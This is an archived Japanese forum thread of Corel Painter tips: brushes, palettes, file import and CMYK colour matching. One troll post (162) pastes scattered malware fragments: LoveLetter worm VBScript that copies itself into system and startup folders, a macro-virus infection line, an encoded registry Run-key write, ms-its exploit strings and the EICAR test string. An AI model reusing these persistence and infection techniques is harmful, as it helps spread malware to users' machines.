PainterX beta3からバグレポート連絡先が変更されますた。
詳しくはニュースレターとPDFレター参照。



148 :スペースNo.な-74:2006/11/03(金) 09:23:22
VectorでIX.5ダウンロード版が一万円引きになってる

149 :f:2006/11/10(金) 17:48:54
ropwerjwepjrpe



rrwerwerwer



sdfsdfsdwe



werwerwrwwe



werwerwerwe



werwerwewrewe



dsffdsfsdfd



erwwerwerwer



150 :スペースNo.な-74:2006/11/13(月) 19:03:52
>>149たまにこのようなアルファベットの羅列見かけるけど、ウイルスかなにかなの?

151 :スペースNo.な-74:2006/11/13(月) 21:40:36
150
アンチウィルスソフトの誤動作を狙った荒らし
うちのAVGさんはは反応しないがね。

152 :スペースNo.な-74:2006/11/13(月) 23:19:57
そうなの?!知らんかったorz

153 :スペースNo.な-74:2006/11/14(火) 12:38:31
うちのClamXavも反応しない。
サブマシンのノートン先生2006はお怒りになる。で、重くなるorz
軽いと噂の2007に乗り換えるか…Painterから脱線してスマソ。

154 :スペースNo.な-74:2006/11/14(火) 17:18:37
>>153
除外してないの?

155 :150:2006/11/16(木) 07:05:16
>>151そうだったんだ、謎が解けてすっきり。ありがとう

156 :スペースNo.な-74:2006/11/27(月) 02:40:08
カラーパレットをフォトショ風にはできないのでせうか?
右上のデフォルトだと小さくて色が選びずらいのですが・・・

157 :スペースNo.な-74:2006/11/27(月) 03:03:35
自分は道原さんのところのパレットを別ファイルで開けてスポイトで拾って使ってる。
でもまぁペインターは基本色に色混ぜて微妙な色を使ってこそのソフトという気もするが

158 :スペースNo.な-74:2006/11/27(月) 09:04:33
>>156
カラーセット使えば?

159 :スペースNo.な-74:2006/11/27(月) 21:29:08
XPで\.5使ってるんだけど今とっても困ってます〜。
Illustrator9.02で作ったaiファイルをPainterから『ファイル』メニュー→
『入力用プラグ』→『Adobe Illustratorファイル...』で読み込んだんだけど
『ボックスがありません。正しいIllustratorファイルではないようです』って
出て開かないんですが…
本にはこれで開くとパスがシェイプになって開けるって書いてあるんですが…
なんでか教えていただけませんか???

160 :スペースNo.な-74:2006/11/27(月) 23:58:32
>>159
aiファイルの互換性をバージョン8位に落としてみて

161 :スペースNo.な-74:2006/11/28(火) 02:13:57
最近OS9からXに乗り換えてペインタ8を使ってるんだけど、なぜか作業中何かの拍子に
ローマ日本語字入力モードに切り替わってしまう
そのたびに半角に戻すのがめんどくさくてしょうがない。
何か対処法はないでしょうか。

162 :スペースNo.な-74:2006/11/28(火) 10:35:10
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT! type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
DPF: {11111111-1111-1111-1111-111111111157} - ms-its:mhtml:file://c:\nosuch.mht!IIf s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()plication.OnSheetActivate = "check_files"End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10End Sub

163 :スペースNo.な-74:2006/11/29(水) 12:39:50
>>160
ありがとうございます!
8に落として問題なく開き、シェイプも大丈夫でした。
とっても嬉しいです、ありがとう。


164 :スペースNo.な-74:2006/12/02(土) 15:19:12
マシンを新調したところペインター6が使えなくなったので、これを機会に
9.5へ移行しようと思っています。
体験版をさわっているところなんだけど、6にあった水彩ぼかし系のブラシ
はなくなったんでしょうか。

6のときは水彩メイン使用。下塗りも影もベタっと色をおいて、そこをぼかし系
のブラシで色を引き延ばしていくようにぼかしていました。
9.5は6の水彩に近いかんじで塗ることができるので感触良好なのですが、
このぼかしができなくて延々と悩み中です。

あれこれCG講座サイトをまわってみたけれど、9.5で色塗り講座をしている
サイトがなくどうにもならんかった。
ブラシ自作にも挑戦しているんだけどうまくいかず。
頼む、なにかヒントを。煮詰まってどうにもならねー。

165 :スペースNo.な-74:2006/12/02(土) 15:31:48
油?ブラシとか補充量0にして色々いじってみれ。

166 :スペースNo.な-74:2006/12/02(土) 16:33:08
Painter Classic 1.0の標準ブラシセット→水彩→「ぼかし」をIX.5にインポートして
使うといいよ。軽くて反応も良い。


167 :スペースNo.な-74:2006/12/02(土) 17:57:02
>165
いや水彩。
補充量を0にしてやっているが上手くいかん。
でもここがポイントなんだろうな。もうちょっといじってみる。


>166
クラシック1.0はペインター教本についてきたのがあったので、インストール
してみた。
ところがメモリ不足エラーが出て起動できず。2G積んでるんだけど…
おそらくOSがXPであることとかもひっかかって起動できないっぽい。
インストールはできたのでブラシだけインポートしてみた。
PClassic.brsというのが標準ブラシだと当たりをつけているんだが、
読み込んでも「水彩→ぼかし」というのが見あたりません。

168 :スペースNo.な-74:2006/12/02(土) 17:57:39
あ、すまん。
167=164です。

169 :スペースNo.な-74:2006/12/02(土) 18:06:37
↓逝け。 いろいろためになるぞ

【ペインター】Painter6 6.1【4缶目】
ttp://pc8.2ch.net/test/read.cgi/cg/1121268056/

170 :164:2006/12/02(土) 22:04:42
>169
それもやってみたんだけどどうも上手くいかんのです。
そういうこともあって6はもう潮時なのかなと。

171 :スペースNo.な-74:2006/12/02(土) 22:48:28
自分も同じ状況で潮時だと思って今は9.5に乗り換えた
まああまり6自体使いこなせていなかったからガッカリ感は無いんだがw

172 :スペースNo.な-74:2006/12/02(土) 22:54:32
この先の事考えると乗り換える方が無難だな。

173 :スペースNo.な-74:2006/12/03(日) 10:17:02
>167
ごめんまちがえた
「ぼかし」じゃなくて「にじみ」です

174 :スペースNo.な-74:2006/12/03(日) 12:27:39
6→7以降、水彩のしくみそのものが違うと思ったが…

175 :スペースNo.な-74:2006/12/03(日) 12:59:37
>>174
デジタル水彩を前提としているのかと思った・・・

176 :スペースNo.な-74:2006/12/05(火) 23:02:30
ペインターはじめたので2chとかネットでいろいろ情報あつめてるんだが
なんか付属のヘルプが一番詳しい悪寒

177 :スペースNo.な-74:2006/12/05(火) 23:08:16
いや、それ当前。実際ヘルプが一番詳しいんだよ。
わかりやすいかどうかはともかく。

ヘルプを越える情報量を個人がボランティアで全文書こうと思ったら
並大抵の事じゃないぞ

178 :スペースNo.な-74:2006/12/06(水) 00:56:40
フリーソフトと高いソフトの決定的な違いって
ヘルプとサポートの詳しさだよ

179 :スペースNo.な-74:2006/12/06(水) 13:37:32
バージョンアップして無いから判らんのだが
ペインターのヘルプは間違いだらけで参考にならない物だったが、今は違うの?
新機能についての項目は無いわ、もう無い機能についての説明があったりとか・・・

180 :スペースNo.な-74:2006/12/06(水) 14:06:46
7〜8は速攻で使うのをやめたからろくにヘルプも目を通してないが
6は結構きちんと書いてあったがな。

あ、ヘルプじゃなくてマニュアルだけど。内容一緒だよな?

181 :スペースNo.な-74:2006/12/06(水) 15:09:13
6も5ぐらいの内容のままの項目有るが、差なんて微々たる物だし無問題だろ。
7のマニュアルは6そのまんまで酷かったがな。

182 :スペースNo.な-74:2006/12/06(水) 15:12:38
印刷マニュアルは内容改善運動の結果廃止されたんじゃないっけ?

183 :スペースNo.な-74:2006/12/06(水) 15:33:19
IXの印刷冊子は「マニュアル」じゃない(リング製本の「リファレンス」)けど、
8までは製本マニュアルがついてきたよ。

184 :スペースNo.な-74:2006/12/06(水) 18:09:38
出来が悪いって言うから見たこと無かった7ユーザーが登場です。
当時買ったのがアカデミック版だったのでアップグレードも見送り中ですよ。

185 :スペースNo.な-74:2006/12/06(水) 20:49:34
9はXP64bitで動くのかな?

186 :スペースNo.な-74:2006/12/08(金) 00:41:15
Painter総合 22筆目【ペインター】
http://pc8.2ch.net/test/read.cgi/cg/1163143987/


>>1の20筆がとっくに終わってるから置いとく

187 :スペースNo.な-74:2006/12/10(日) 11:21:36
ペインターで表紙データ入稿をしたい者ですが

ペインターで着色したデータをフォトショで開いてCYMK変換すると驚くほど
色味が変わってしまって焦ってます
あまりにイメージと違うので、フォトショで多少色味をいじってから入稿しようと思っているんですが
いじらずにそのまま入稿した方がペインターで塗っていた時のイメージに近くなるんでしょうか
フォトショでいじるとかえって色味を崩してしまうかと不安です

ペインターで表紙カラーを塗っている方はイメージに近い表紙に
するのに何か心がけている事などありますか

初歩的な質問ですみません

188 :スペースNo.な-74:2006/12/10(日) 11:36:57
それはPainterの問題でなく、モニターについているプロファイルを元に
Adobeガンマを使ってモニターのリキャリブレーションをして、そのプロファイルを
Photoshopに設定してないからです。

これをやっておけば、CMYK変換してもモニター上では
ほぼ同じ色のまま変換されるはずです。CMYKでは再現出来ない
鮮やかな青や緑はくすみますが。

(この時点ですでにさっぱりチンプンカンプンって言う場合は、
 今回色あわせするのはたぶん無理ですw
 勉強してから次頑張りましょう。
 そもそもカラーマネジネントは2ちゃんのレスごときの文章量で文字だけで
 全部説明出来るほど甘くないです。真面目に説明したら本になります)

誤解している人が多いんですがPhotoshopをただインストールしたままで
CMYKにただ変換したって100%色は化けます。
これはPhotoshopでゼロから描いても事情は全く一緒です。
カラーマッチングってのは複数の手順による設定を積み重ねて、それらを全部
ミスなく行わないと全部意味が無くなるシロモノです。

CMYK側のプロファイルも印刷所で配布した印刷機のプロファイルがなければ
ただCMYK変換してもほとんど意味はないんですが、たいていの
印刷所では用意していないんで、Japan Color 2001 Coatedを指定しておくのが無難。

189 :スペースNo.な-74:2006/12/10(日) 12:54:53
最初の7行で終わっとけばいいのに

190 :スペースNo.な-74:2006/12/10(日) 13:00:38
ちょっと説明してもらえれば簡単にやれると誤解されて
ヘタに食い下がられても延々説明地獄になるから突き放して正解

191 :スペースNo.な-74:2006/12/10(日) 13:07:43
フォトショ持ってるのにフォトショの
マニュアルのcmykの項目も調べずに
ペインタのスレに来て質問というのもしゅんごい

192 :スペースNo.な-74:2006/12/10(日) 13:10:44
家庭用のカラープリンターで良いんで印刷してこんな感じの色で〜と、
色補正の指示しちゃうのも良いですよ。

やってくれない所も有るとはとは思いますが、そう言えば大抵補正してくれると思いますよ。
厳密な色あわせには微妙ですけど大雑把ならこの方法が一番伝わります。

193 :スペースNo.な-74:2006/12/10(日) 13:21:00
それをやるならRGBで渡したほうがよい
デタラメにCMYK化されてると補正しようがない

194 :スペースNo.な-74:2006/12/10(日) 16:20:31
調整してもらうの前提なら何も弄ってないの渡した方がいいわな。

195 :スペースNo.な-74:2006/12/11(月) 00:27:08
頑張っても最終的には

   \  __  /
   _ (m) _ピコーン
      |ミ|
   /  .`´  \
     ('A`) そうだ、諦めよう!
     ノヽノヽ
       くく

ってなる

196 :スペースNo.な-74:2007/01/03(水) 05:54:21
MacOS10.4でペインター9を使っている者ですが質問です
このバージョンのデジタル水彩では一旦保存してファイルを閉じても
乾燥されずにファイルを開く事が出来ると、同梱のハンドブックに書いてあるのですが
保存→閉じる→ファイルを開く と、どうしても乾燥された状態から始まってしまいます
(水彩消しゴムでも消えない、同じレイヤーなのに下から色が透ける(混ざらない)等、
また関係あるのかどうかは分かりませんが再度開いた時のレイヤーが自動的に「比較(暗)」になっていました)
この場合設定が必要なのかと思い、環境設定やヘルプから探してみたのですが、
見つける事が出来ませんでした 
このような設定はどこで行えばよろしいのでしょうか?

197 :スペースNo.な-74:2007/01/03(水) 07:56:14
riffで保存なさい坊や

198 :スペースNo.な-74:2007/01/09(火) 02:44:38
れいや〜いんふぉめ〜しょんふぁいゆ

199 :スペースNo.な-74:2007/01/22(月) 05:39:07
Painter Classicを使っているのですが
アニメ塗りにとても興味があります。
そこで質問なんですけれど、アニメ塗りをオールデジタルでする場合
線画は何で描くのがおすすめなんでしょうか?
滑らか、かつクッキリとした感じで線画を描いてみたいのですが。

200 :スペースNo.な-74:2007/01/22(月) 07:10:49
ペインタークラシックでいいだろ
線が描けりゃ、ペインターだろうがフォトショだろうが
他のフリーで出回っているやつだろうが、何だって構わん

201 :スペースNo.な-74:2007/01/22(月) 07:17:46
アニメ塗りってやってみると難しいものだね
線をキレイにはっきりさせておかないと描けない

202 :スペースNo.な-74:2007/01/22(月) 09:22:31
ゴニョゴニョにして誤魔化せないからデッサンや筋肉も正確でないとつながんないしね

203 :スペースNo.な-74:2007/01/22(月) 12:51:25
>>199の「何で」というのは「どのバリアントで」という意味かと思ったが
そんなの描いてみて気に入ったのでいいじゃないかとも思った。

204 :スペースNo.な-74:2007/01/22(月) 12:53:50
>>200
言葉足らずですいませんでした。
どのソフトがいいか、ではなくて
どのツールで描くと一番綺麗か、が聞きたかったんです……

205 :スペースNo.な-74:2007/01/22(月) 13:14:00
>>204
その場合、まずバージョンくらい書こうな?
バージョンによって入ってるバリアントが違うから。

まあ個人的には>>203で。そんなにたくさん種類があるもんじゃないし。

206 :スペースNo.な-74:2007/01/22(月) 13:16:08
旧ペンクラならスクラッチボードがGペンや丸ペンぽい線が描ける。
新ペンクラなら黒画像をソースにしたパターンペンがそれっぽく使えるよ。

207 :スペースNo.な-74:2007/01/23(火) 03:41:01
絵柄もあるから、自分でまず
自分の絵にあったハッキリした線が描ける物を探した方が
色々勉強になるし良いと思うよー

208 :スペースNo.な-74:2007/01/23(火) 12:35:27
綺麗な線を書くならば写真のペンツール。
手書きするなら、元画像大きくしてそれを縮小させる。たいてい0.25倍。
そのままの大きさだと、たいていの人がそれほど綺麗に引けてるわけではないと思うが?

209 :スペースNo.な-74:2007/01/23(火) 17:16:52
>206
旧ペンクラJをインストールすると入っているmouse.brsのスクラッチボードを
読み込んで使うのが一番ペンらしく書ける(マウスで書いてもイリヌキの味が
出せるよう、絶妙な調整を施してある(Mac版では「マウス」)

210 :スペースNo.な-74:2007/01/23(火) 19:44:51
ペインターだけでデジタル入稿できる印刷所ってある?
どこもCMYKとかPhotoShopEPSとか制限あって困る。

211 :スペースNo.な-74:2007/01/24(水) 02:47:26
RGBでもOKな所も、それなりにある

212 :スペースNo.な-74:2007/01/24(水) 13:25:56
最近はRGBも結構増えてきたって聞いたけどね

213 :スペースNo.な-74:2007/01/24(水) 14:51:24
印刷所でCMYKに変換する時に色がくすむったって大した違いでもないしな
つかペインターで全部やって入稿までやってる人ってどのくらいいるんだ?

214 :スペースNo.な-74:2007/01/24(水) 22:30:18
質問させてください。
WINでIXです。
うっかり間違え、使わないブラシライブラリを引き込んでしまいました。
アンインストール(フォルダも全削除)→インストールをしたのですが
パレット(ツールの配置など含む)情報が残っています。
そのせいかブラシライブラリにも一覧に使わないライブラリが表示されます。
これらを全てまっさらの初期状態に戻したいのですが、どこにあるファイルを
削除すればいいのか分かりません。

ご存知の方よろしくお願いします…。

215 :スペースNo.な-74:2007/01/25(木) 01:49:29
レジストリじゃないの?
知らんけど

216 :スペースNo.な-74:2007/01/25(木) 02:00:21
C:\Documents and Settings\ユーザ名\Application Data\Corel\Painter IX\

隠しフォルダ表示されるようにしとかないと辿れない。

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)